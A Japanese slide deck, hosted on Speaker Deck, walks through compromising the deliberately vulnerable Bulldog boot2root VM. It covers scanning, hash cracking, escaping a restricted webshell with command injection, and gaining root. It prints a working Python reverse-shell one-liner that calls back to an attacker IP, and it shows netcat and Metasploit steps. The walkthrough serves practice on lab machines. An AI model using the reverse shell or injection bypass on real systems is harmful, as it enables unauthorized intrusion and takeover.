$30 off During Our Annual Pro Sale. View Details »
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
boot2root_kalilinux_bulldog
Search
MarkUP
November 02, 2018
0
23
boot2root_kalilinux_bulldog
MarkUP
November 02, 2018
Tweet
Share
More Decks by MarkUP
See All by MarkUP
OwaspZap
markup
0
91
burpsuite_badstore
markup
0
120
boot2root_kalilinux_droopy
markup
0
33
侵入検知のファーストステップ
markup
0
680
Featured
See All Featured
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
52
5.8k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3.2k
The Cost Of JavaScript in 2023
addyosmani
55
9.3k
Building a Scalable Design System with Sketch
lauravandoore
463
34k
Large-scale JavaScript Application Architecture
addyosmani
515
110k
KATA
mclloyd
PRO
32
15k
How STYLIGHT went responsive
nonsquared
100
6k
Java REST API Framework Comparison - PWX 2021
mraible
34
9k
jQuery: Nuts, Bolts and Bling
dougneiner
65
8.2k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
48
9.8k
Unsuck your backbone
ammeep
671
58k
The Art of Programming - Codeland 2020
erikaheidi
56
14k
Transcript
サーバ侵入手法 Bulldog
BulldogVM • インストール https://www.vulnhub.com/entry/bulldog-1,211/
Virtualbox ダウンロード https://www.virtualbox.org/wiki/Downloads
Virtualbox インポート
Virtualbox ネットワーク設定
Virtualbox ネットワーク設定
Virtualbox スナップショット
ホスト検索 ①> nmap –sP 192.168.99.0/24 –sP: pingを利用してそのネットワークで現在動作している マシンの一覧を取得する事が出来る
ポートスキャン ①> nmap -A 192.168.99.101 -A:OSの種類やその他詳細なバージョン情報などを取得可能
ポートスキャン
サーバスキャン ①> nikto –h 192.168.99.101 -h:対象のIPアドレスを指定するオプション
サーバスキャン /dev/
ディレクトリスキャン ①> dirb http://192.168.99.101/ /usr/share/wordlists/dirb/ common.txt ディクショナリファイル(/usr/share/wordlists/dirb/common.t xt)を使用してディレクトリのWebサーバー(http://192.168.99. 101/)をスキャンします。 参考:https://tools.kali.org/web-applications/dirb
ディレクトリスキャン /admin/
http(ポート80)へのアクセス ECサイトっぽいが閉鎖中
http(ポート80)へのアクセス ハッキングを受けた的な 事を書いているけど、こ こから特に情報は得れな い。
/dev/ sshが可能であることと、WebShell があることが記載されている。 WebShellでは認証が要求される
/admin/ 管理者画面へアクセス可能 usrnameとpasswordが必要
/dev/ ソース メールアドレスとハッシュ値を取得
ハッシュ値のクラッキング ・オンラインのハッシュクラッキングツールを使用する http://crackhash.com/ https://crackstation.net/ nickとsarahのパスワードが わかった
管理者ページへの認証 管理者ページの認証をnick かsarahのどちらかでログイ ンすると、webshellの利用 条件が整う。
WebShell • webshellへアクセスすると、使用できるコマンドが制限されて いる。
echoコマンド echoコマンドはバック クォートで囲った中身をコ マンドとして実行し、その 結果を出力する。 または、$(…)で囲うことで も実行可能。
「|」パイプ シンプルに「|(パイプ)」で も制限外のコマンドを使用 できることがわかる。
ReverseShell • リバースシェルの仕組み ①攻撃コードを送信 ②攻撃に成功し、被攻撃側が攻撃側に接続を行うよう命令が実行され る ③攻撃側が待ち受けているポートに被攻撃側が接続し、制御が奪われ る 参考: http://www.atmarkit.co.jp/ait/articles/1507/01/news023.html
ReverseShell • python2系がインストールされているサーバなのでpythonのリ バースシェルを使用する。 shell.py 参考: http://pentestmonkey.net/cheat- sheet/shells/reverse-shell-cheat-sheet import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("attackerIP",attackerPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p =subprocess.call(["/bin/sh","-i"]);
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
ReverseShell ・リバースシェルの実行 attacker target
(参考)ncコマンド ・port scaning(ポートが空いているか確認) % nc -vz [remotehost] 23 ・port knoking
(ポートを使用してるサービスを確認) % nc [remotehost] 80 ・ファイル転送 (転送先) % nc -lvp 20000 ※標準出力される (転送先) % nc -lvp 20000 > file ※ファイル出力される (転送元) % nc [remotehost] 20000 < file オプション -z ポートスキャニングモード オプション -l リッスンモード オプション -v 情報表示モード オプション -p ポート番号指定
msfvenomを使用したReverseShell metasploitの機能であり、ペイロードジェネレータです。 リバースシェルのペイロードを作成できます。 https://www.offensive-security.com/metasploit-unleashed/ms fvenom/
ncコマンド ・リバースシェルファイルをtargetへ転送 target attacker
Metasploit framework
Metasploit framework ・リバースシェルの実行 attacker target
Metasploit framework
root権限へ昇格
パスワード推測 SUPERultH imatePASH SWORDyouH CANTget SUPERultHimatePASHSWORDyouHCANTget SUPERultimatePASSWORDyouCANTget
権限昇格